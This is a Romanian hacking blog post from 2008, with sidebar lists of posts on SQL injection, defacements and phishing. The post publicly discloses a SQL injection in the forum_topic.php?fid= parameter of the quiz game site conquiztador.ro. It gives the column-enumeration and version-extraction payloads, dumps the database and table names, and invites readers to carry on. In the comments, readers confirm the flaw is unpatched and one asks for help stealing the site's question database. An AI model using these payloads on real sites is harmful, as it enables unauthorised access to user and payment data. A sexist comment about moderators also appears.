- Hacker Uses XSS and Google Street View Data to Determine Physical Location
- CAnCAn te iubim, CA CA tine nu gasim. Superfete.cancan.ro e de rahat
- Deface (?!?) pe Cotidianul.ro
- Virusi in clipuri video [how to]
- Cyber-Bullying – palma parinteasca a noului mileniu
- Christopher “moot” Poole: The case for anonymity online
- Wtf Avira?
- Some old story about tagged.com
- Pwning cam girls for fun
- Tabloshit
- Yahoo! again - XSS in Uncategorized (357 Visits)
- Yahoo! again - bad settings? in Uncategorized (252 Visits)
- Fanii nostri in Uncategorized (183 Visits)
- Frustrant in Uncategorized (146 Visits)
- La multi ani România, la multi ani românilor in Uncategorized (137 Visits)
- Weblog.ro - Shell via Local File Inclusion in Uncategorized (119 Visits)
- Yahoo! epic fail - permanent xss unleashed in Uncategorized (50 Visits)
- ... in Uncategorized (38 Visits)
- XSS Ownage - hi5 vs. Yahoo! + video in Uncategorized (2 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in Uncategorized (2 Visits)
- Hackersblog.org is now blog.rstcenter.com in (1770 Visits)
- O mica dar importanta precizare in (1371 Visits)
- Twitter in (805 Visits)
- This is the end in (776 Visits)
- Ce servicii de mail folositi? in (773 Visits)
- Un nou membru in (730 Visits)
- La multi ani România, la multi ani românilor in (718 Visits)
- Inca o pierdere de timp in (674 Visits)
- De reţinut in (634 Visits)
- Azi este ziua userilor hackersblog.org in (610 Visits)
- SMS scam (1) in (564 Visits)
- Dezinformare sau proasta informare? in (563 Visits)
- Hi5.com coders read this in (553 Visits)
- Phishing Raiffeisen cu atasament html in (516 Visits)
- Phishing Bancpost in (486 Visits)
- Si tentativele de phishing pot fi amuzante in (422 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/mail (2) in (2707 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in (2601 Visits)
- Despre CSRF, hi5.com, cum sa trisezi la concursuri s.a.m.d. in (1143 Visits)
- [Utilitare] Suna gratis de pe internet sau de pe iPhone in (1107 Visits)
- Ce nu se invata la scoala - (D)DOS (5) in (950 Visits)
- Virusi in clipuri video [how to] in (838 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam (1) in (725 Visits)
- Yahoo! redirects - a big issue (with video) in (570 Visits)
- Internet vs. privacy (1) in (469 Visits)
- Ca musca in... in (435 Visits)
- RedTube.com ... The Free Sex Video Community in (12973 Visits)
- usa.kaspersky.com hacked ... full database acces , sql injection in (4921 Visits)
- libertatea.ro vulnerabil la (blind) sql injection in (2950 Visits)
- Pwning cam girls for fun in (2586 Visits)
- Telegraph.co.uk hacked, sql injection in (2546 Visits)
- Facebook hacked - sql injection in (2425 Visits)
- Simpatie.ro, matrimoniale3x.ro, apetisant.ro, deliciu.ro , etc Sql injection in (2406 Visits)
- F-Secure.com - SQL Injection + Cross Site Scripting in (1775 Visits)
- [Hacked]Bitdefender (Portugal) exposes sensitive customer data in (1743 Visits)
- Wtf Avira? in (1723 Visits)
- Christopher "moot" Poole: The case for anonymity online in (1495 Visits)
- Digital Photocopiers Loaded With Secrets in (1458 Visits)
- Wannabe Hackers [2] - cum sa faci un virus by sppy_hacker in (592 Visits)
- Wannabe Hackers [1] - Cum sa hack-uiesti RapidShare-ul in (590 Visits)
- Hope 2603 – Kevin Mitnick - Life a Computer Hacker – Revealed in (463 Visits)
- PRIVACY IS DEAD - GET OVER IT, Pt 01-34 (Recommended by Hackersblog ) in (396 Visits)
- Oldies but goodies - Freedom Downtime - The Story of Kevin Mitnick in (379 Visits)
- [Video] The History Of Hacking in (373 Visits)
- Email Security - Why You Should Encrypt Your Email - Part One in (368 Visits)
- The Story of DEFCON in (343 Visits)
- Deface - tuttoaffari.lastampa.it si citymusiclab.city.corriere.it in (3493 Visits)
- RNS vs. RAI - citizenreport.rai.it hacked. in (3300 Visits)
- Hi5 email finder si sfarsitul a tot ceea ce inseamna privacy in social networking in (2996 Visits)
- Se poate sparge parola de Yahoo? in (2572 Visits)
- Free SMS time, TrimiteSMS.ro in (2492 Visits)
- Planete-plus-intelligente.lemonde.fr defaced by R.N.S. in (2464 Visits)
- Gmail uber hacking in (2256 Visits)
- Camera de supraveghere a universitatii Alexandru Ioan Cuza din Iasi in (2255 Visits)
- Cancan.ro spart pentru a doua oara intr-o zi in (2252 Visits)
- Stiri cu antena3 in (2208 Visits)
Posted on November 24th, 2008
Da…again. Cu putin timp in urma am descoperit parametrul companyid= vulnerabil. Atunci n-am facut public sintaxa pentru extragerea datelor. Adminii au primit mail, si au securizat iesirea. Conquiztador este un joc,ce se joaca in multe tari,pe aceasi platforma. Doar cel din ro avea adaugat parametrul logoclick.php?companyid= . Pentru ce credeti ca era? Pentru a face reclama. Si cui? Desigur,in mare parte,firmelor apartinatoare trustului Pro.
Dar…si zic dar, pentru ca de data asta parametrul descoperit vulnerabil este global,valabil pentru toate platformele tarilor in care se joaca jocul.(O simpla cautare pe google inurl:”forum_topic.php?fid=” va convinge)Deci parametrul vulnerabil este fid= in sintaxa forum_topic.php?fid= .Totusi pentru a putea exploata vulnerabilitatea avem nevoie de niste cunostinte sql, deoarece rezultatele nu sunt afisate simplu, in text clar.
Dar un mic exercitiu poate sa faca oricine. Sa luam adresa:http://www.conquiztador.ro/forum_topic.php?fid=5
si aflam numarul coloanelor: http://www.conquiztador.ro/forum_topic.php?fid=5+order+by+1/* true, adica apare pagina originala. Inlocuim 1 cu 2 si tot asa pana la 5, true… La 6 vom avea http://www.conquiztador.ro/forum_topic.php?fid=5+order+by+6/* eroare, deci avem 5 coloane.
Acum sa aflam versiunea bazei de date
select 1,unhex(hex(@@version)),3,4,5 vom avea drept rezultat: 1, 5.0.32-Debian_7etch3-log, 3, 4, 5
Numele bazelor de date sunt:
[*] cq_ro
[*] information_schema
[*] mysql
[*] mysql_old
[*] test
Pe noi ne intereseaza cq_ro. Tabele acestei baze de date sunt:
aa_unban2
aa_unban3
aa_users_chat_save
aa_users_unban
ad_download
addrbook
adperiods
advert
agecategory
askedgroups
auct_cycle
auct_hist
auct_item
auct_win
badmarking_mcq
badmarking_tq
badquestion
balance_change
balance_users
banner
bannerplace
bannerplace_old
bctrack
bctrack_user
brokenconn
cachecontrol
chatmsg
cities
clientactionlog
clinks
companies
competition
competition_games
compticket
compuser_codes
compusers
connections
costingames
countries
county
cqusers
ctrldata
dbsmlog
dbsmver
dbversion
deletedquestions
division
eventlog
faq
forum_cat
forum_msg
forum_topic
forum_topic_last
game
helppages
inv_head
inv_item
inv_unit
item_dnloads
jepgen
jeprecalc
lanswers
layerpopup
links
linktrace
login_log
loginq
loginq_temp
logins
logo_download
lqj_answers
lqj_question
lqj_targetcity
lqj_useransw
mailhead
mailmsg
mailmsg_del
moderatorlog
moneychange
moneymovecode
moneyticket
monthlystats_temp
msgfilter
news
news_head
newsletter
newslettersend
online
parameters
preloader
preloader_date
preloader_downcount
preloaderconf
qhistory
qrating
question
questioncat
questionclass
questionratinglog
questionrow
reportx
rl_competition
rl_competition_users
rl_day
rl_day_prev
rl_games
rl_jep
rl_knl_day
rl_knl_day_temp
rl_stu_grp
rl_vep
sanyistat
settings
smith_repro
smith_robot
stu_game
stu_usergame
stu_userpoints
themegroup
themes
ticketcodeerror
tipgroup
tiphistory
tipquestion
tipquestionrow
tiprating
tipthemes
tournament_fgames
tournament_qresults
tournament_usergame
tournament_users
tournaments
user_clicks
useragent
useransstat
usergame
usergame_comp
userpoints
userpoints_comp
users
users_addr
users_chat
users_data
users_email
users_extra
users_flaggers
users_forum
users_gold_temp
users_gold_temp2
users_locations
users_names
users_names_deny
users_presence
users_questions
users_questions_action
users_questions_admindesc
users_secureq
ws_basket
ws_cat
ws_deliver
ws_images
ws_itemmove
ws_movetype
ws_orderhead
ws_orderitem
ws_orderstates
ws_product
zipcodes
Mai departe faceti voi.
December 9th, 2008 at 9:54 am
[...] primit azi următorul link de la Danv. Dacă o să citiţi postarea de pe hackersblog o să vedeţi cât de banală este [...]
December 9th, 2008 at 2:08 pm
culmea e ca nici acum n-au securizat parametrul, deci e vulnerabil in continuare (degeaba au fost anuntati)
December 17th, 2008 at 9:14 pm
am incercat sa aflu explicatii de la moderatori si mi-a dat oana aia ban. se comporta ca atunci cand au aparut codurile. cre’ca le e greu sa recunoasca cand gresesc si moderatorii sunt mai inapti decat aia vechi. asa e cand pui femei proaste la conducere
December 17th, 2008 at 9:14 pm
[...] Pentru continuare si mai multe informatii cititi articolul intreg pe HackersBlog.org! [...]
January 2nd, 2009 at 10:47 pm
Btw, stiti de ce le merge site-ul asa “bine”? De prin Mai parca au introdus sistemul de criptare RSA in conexiunea jocului… la atatea numere prime mi se pare normal sa se blocheze
… Iar decriptarea mie imi ia cam 2-3 secunde. Stie careva daca mai merge aflarea variabilelor din javascript?
January 4th, 2009 at 12:46 am
Din cate am inteles versiunea romaneasca are o criptare mult mai eficienta decat versiunile celorlalte tari si sansele de a trece de aceasta criptare si de a creea un nou cheat s-au micsorat considerabil.
February 26th, 2009 at 5:40 am
Diese seite ist genauso interessant wie informativ. Viele Grüße!
March 20th, 2009 at 6:21 am
Nice work chief
March 20th, 2009 at 6:23 am
Spent some great time in your site, really enjoyed it
March 20th, 2009 at 6:24 am
Exstremely lovely site. Very impressed about all the lesson there are to learn and to know how much help is there also. Keep up the great work
March 12th, 2010 at 5:22 pm
Salut! Nu stiu daca am procedat corect tinand cont ca am postat aici. Sunt nou aici si m-am gandit sa cer putin ajutor (sfat,parere). Am facut un program la conquiztador si un boot de colectare dar nu am rabdare sa stau sa le colectez asta dupa parerea fiindca ar exista si alta cale. As dori sa sustrag toate intrebarile din db dar din cate am incercat eu nu mai este vulnerabila la sqli. Multumesc orice sfat este bine primit. O zi buna
April 10th, 2010 at 2:05 pm
@ Nimeni Altul Te ajut si eu cu boot ul de colectare. ID: marius_ionuty